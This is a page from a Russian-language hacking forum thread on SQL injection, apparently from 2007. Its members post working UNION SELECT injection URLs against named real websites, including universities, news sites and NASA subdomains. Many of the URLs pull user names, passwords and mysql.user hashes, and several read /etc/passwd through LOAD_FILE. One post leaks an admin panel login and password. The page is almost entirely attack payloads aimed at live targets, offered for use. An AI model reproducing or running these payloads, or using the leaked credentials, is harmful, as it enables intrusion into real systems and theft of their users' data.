SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 18 of 798
  1. PAB

    PAB New Member

    Joined:
    27 Jan 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://washingtontimes.com/functions/email.php?StoryID='
    Пример :
    '%20union%20all%20select%20top%20800%20UserID,1%20from%20Insider_Users--
    '%20union%20all%20select%20top%20800%20password,1%20from%20Insider_Users--
     
    #341 PAB, 28 Jan 2007
  2. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.globalsat.su/news.php?n_id=-1+union+select+1,2,3,4,5,222,7/*

    http://www.export.by/rus/news2.php?action=archive&from=130&cat_id=-1+union+select+1,2,22,user,password,6,7,8,9,10+from+mysql.user/*

    http://www.know-house.ru/card_firm.php?n_id=12'
     
    #342 *D1VER, 28 Jan 2007
    1 person likes this.
  3. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.emic.ee/page.php?id=55555%20union%20select%201,2,3,4,5,6,VERSION(),8,9,DATABASE(),11,12,13,14,15/*--
     
    #343 kair, 28 Jan 2007
  4. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.latek.com.ua/index.php?page=produkt.php&subcat=-1+union+select+1,1,55,66,6,concat(log,char(58),pas),3,8+from+user+limit+0,11/*

    http://www.vigvam.ru/index.php?chp=anec_full&id=-1+union+select+database()/*

    http://www.vengria.com/index.php?page=statji&Id_s=-1+union+select+1,2,3,4,user_name,user_pass,7,8,9,10,11,12,13+from+users+limit+0,1/*

    http://www.skysharks.ru/index.php?page=news&id=-1+union+select+1,concat(email,password),username,4,5,6,7+from+user/*

    http://www.in-sports.ru/index.php?page=news&nid=-1+union+select+1,2,3,4,5/*

    Портал Киберспорта )
    http://www.trutnee.com/index.php?page=1&id=-1+union+select+1,2,3,login,5,6,password,8+from+users+limit+0,1/*
     
    #344 *D1VER, 29 Jan 2007
    Last edited: 29 Jan 2007
    1 person likes this.
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    не смог подобрать нужную кодировку =\
     
    #345 Spyder, 29 Jan 2007
    2 people like this.
  6. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    MichaelPollan.com
    Code:
    http://www.michaelpollan.com/article.php?id=-1+union+select+1,user(),version(),4,5,6,database(),8,9,10/*
    KeckObservatory.org
    Code:
    http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
    BlogsForLearning.msu.edu
    Code:
    http://blogsforlearning.msu.edu/articles/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
    Code:
    http://www.c82.net/article.php?ID=1'
http://www.uua.org/uuawo/new/article.php?id=-1'
http://www.soaw.org/new/article.php?id=-1'

    нельзя инклуды, шеллы =\
     
    #346 InferNo23, 29 Jan 2007
    Last edited by a moderator: 29 Jan 2007
  7. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.02.ru/news/index.php?id_tn='02'
     
    #347 kair, 29 Jan 2007
    1 person likes this.
  8. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.ifmo.ru/sr/?out=person&id=75'%20union%20select%201,2,3,4,5,6,7/*
     
    #348 kair, 29 Jan 2007
  9. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90

    http://www.keckobservatory.org/article.php?id=-1+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7,8/*
     
    #349 Sn@k3, 30 Jan 2007
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.fgb.ge/index.php?lang_id=ENG&sec_id=10050+union+select+1,2,3,4,5,6,concat(editor_userneme,0x3a,editor_pwd)+from+editors/*
    Code:
    http://www.fgb.ge/admin
    admin:itdc1526

    :)
     
    #350 n0ne, 30 Jan 2007
  11. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.brandonsun.com/story.php?story_id=-1+union+select+password,2,user,4,5,6,7,8,9,10+from+mysql.user/*
    Code:
    http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,version(),user,7,8,9,10,11,12,13,14,15,password,17,18,19+from+mysql.user/*
    Code:
    http://www.magic-productions.fr/games_details.php?game_id=-1+union+select+1,2,3,4,version(),6,7,8,9/*
    Code:
    http://www.trackandfieldnews.com/lists/display_list.php?list_id=-1+union+select+1,user(),3,version(),5,6/*
    Code:
    http://www.jacksonholenews.com/article.php?art_id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    Code:
    http://rfe.org/showCat.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8/*
     
    #351 InferNo23, 30 Jan 2007
    1 person likes this.
  12. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    моя первая инъекция!!!
    :D :D :D
    1 столбец
    :D :D :D :D
    http://www.mtas.ru/second.php?ID=-1+union+select+1/*
     
    #352 BlackCats, 30 Jan 2007
    3 people like this.
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    и ещёёёё +)

    http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

    http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10/*

    http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
     
    #353 BlackCats, 30 Jan 2007
    3 people like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =)
     
    #354 Spyder, 30 Jan 2007
    1 person likes this.
  15. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90

    http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9,%2010,11,12,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),14,15,16,17,18,19,20,21,22,23,24,25,26%20,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

    /etc/passwd

    snak3.h17.ru/tools - тут меняем кодироФФку(char etc)
     
    #355 Sn@k3, 30 Jan 2007
  16. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    crb02.gsfc.nasa.gov

    http://crb02.gsfc.nasa.gov/personnel/viewperson.php?id=4'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*

    www.ueet.nasa.gov

    http://www.ueet.nasa.gov/toi/viewtoi.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

    human-factors.arc.nasa.gov

    http://human-factors.arc.nasa.gov/ihh/web/accomplishments/news/news_item.php?id=-1+union+select+1,2,3,4,5,password,7,8+from+user/*
     
    #356 Sn@k3, 30 Jan 2007
    Last edited: 31 Jan 2007
    2 people like this.
  17. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    даа, на насе вообще туева хуча скулей =\
     
    #357 ice1k, 31 Jan 2007
    3 people like this.
  18. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    NSKFitness.ru

    http://www.nskfitness.ru/articles.php?cat_id=-1+union+select+1,2,user(),version(),5,database(),7,8,9,10,11/*
     
    #358 InferNo23, 31 Jan 2007
    2 people like this.
  19. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://stat.euv-ffo.de/cgi-bin/scripts/user/user_view/user_profile.php?user_id=-5%20union%20select%201,2,3,4,5,6,7,8,9,0,11,22,33,44,55,66,77,88%20from%20users/*

    http://www.kinoman.net/index.php?page=disco&s=album&id=-18%20union%20select%201,2,3/*

    http://www.transformersfanfic.com/index.php?view=PublicSubmission%2FRateList&submission_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0/*

    http://www.three-rings.com/gorytunes/smooves.php?user_id=-5%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*

    http://www.eco-housing.org/eco/print.php?type_id=-20%20union%20select%201,2,3,4,5,6,7%20from%20user/*&type=news
     
    #359 kamaz, 31 Jan 2007
  20. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.deltasigmacorp.com/version2/category.php?id=-1+union+select+1,2,3/*


    там названия таблиц же есть и столбцы уже есть) че не вывел ан примере) хотя там стоющего ничего нет)
     
    #360 Sn@k3, 1 Feb 2007
(You must log in or sign up to post here.)
Page 18 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.